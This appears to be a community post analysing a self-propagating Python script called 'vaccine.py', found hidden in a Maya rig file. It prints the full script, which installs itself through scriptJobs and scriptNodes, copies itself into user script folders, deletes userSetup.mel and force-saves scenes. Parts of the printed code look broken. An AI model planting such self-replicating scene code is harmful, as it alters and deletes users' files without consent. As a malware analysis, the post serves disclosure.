This is a scene file from the CG Monastery Discord chat user @roly, containing an embedded script that auto-installs and calls itself on SceneSave. The script was found in the rig bat_rig_04.mb, rather than the animation file, TURN_ani_bat_23.ma. Find the imported scene file below (5340 kb).
What happens?
- Installs itself on scene-open, as a
cmds.scriptJob - Installs itself on Maya open, as
~/maya/scripts/vaccine.py - Warning on scene save with the following message
Suspicious words
- virus
- antivirus
- vaccine
Suspicious calls
Calls that don't belong in any rig or animation file.
os.makedirsos.removeos.path.existsshutil.copyfilecmds.internalVar
Full Script Job
Obfuscated and hidden inside of the binary .mb file is this.
# coding=utf-8
# @Time : 2020/07/05 15:46
# @Author : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b
# @File : vaccine.py
# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3
import maya.cmds as cmds
import os
import shutil
class phage:
@staticmethod
def backup(path):
folder_path = path.rsplit('/', 1)[0]
file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
backup_folder = folder_path + '/history'
new_file = backup_folder + '/' + file_name + '_backup.ma '
if not os.path.exists(backup_folder):
os.makedirs(backup_folder)
shutil.copyfile(path, new_file)
def antivirus(self):
health = True
self.clone_gene()
self.antivirus_virus_base()
virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
all_script_jobs = cmds.scriptJob(listJobs=True)
for each_job in all_script_jobs:
for each_gene in virus_gene:
if each_gene in each_job:
health = False
job_num = int(each_job.split(':', 1)[0])
cmds.scriptJob(kill=job_num, force=True)
all_script = cmds.ls(type='script')
if all_script:
for each_script in all_script:
commecnt = cmds.getAttr(each_script + '.before')
for each_gene in virus_gene:
if commecnt:
if each_gene in commecnt:
try:
cmds.delete(each_script)
except:
name_space = each_script.rsplit(':',1)[0]
cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))
if not health:
file_path = cmds.file(query=True, sceneName=True)
self.backup(file_path)
cmds.file(save=True)
cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')
else:
cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')
@staticmethod
def antivirus_virus_base():
virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
if os.path.exists(virus_base):
try:
os.remove(virus_base)
except:
cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')
def clone_gene(self):
vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
if not cmds.objExists('vaccine_gene'):
if os.path.exists(vaccine_path):
gene = list()
with open(vaccine_path, "r") as f:
for line in f.readlines():
gene.append(line)
npetri_dish_gene = """
import sys
import maya.cmds as cmds
maya_path = cmds.internalVar(userAppDir=True) + /scripts
if maya_path not in sys.path:
sys.path.append(maya_path)
import vaccine
cmds.evalDeferred(leukocyte = vaccine.phage())
cmds.evalDeferred(leukocyte.occupation())
with open(petri_dish_path, "w") as f:
f.writelines(petri_dish_gene)
"""
cmds.scriptNode(st=1,
n='vaccine_gene', stp='python',
bs=bs)
cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
cmds.setAttr('vaccine_gene.notes', gene, type='string')
if not cmds.objExists('breed_gene'):
cmds.scriptNode(st=1,
n='breed_gene',
stp='python',
bs="""\
import os
vaccine_path = cmds.internalVar(userAppDir=True) + /scripts/vaccine.py
if not os.path.exists(vaccine_path):
if cmds.objExists(vaccine_gene):
gene = eval(cmds.getAttr(vaccine_gene.notes))
with open(vaccine_path, "w") as f:
f.writelines(gene)
""")
def occupation(self):
cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
just came across this randomly, here's a few strings in that file translated into English.
Vaguely looks like self-propagating guerilla antivirus. Designed to remove certain malware from Maya installs, hilarious.
^ Hilarious. There must be a story behind this.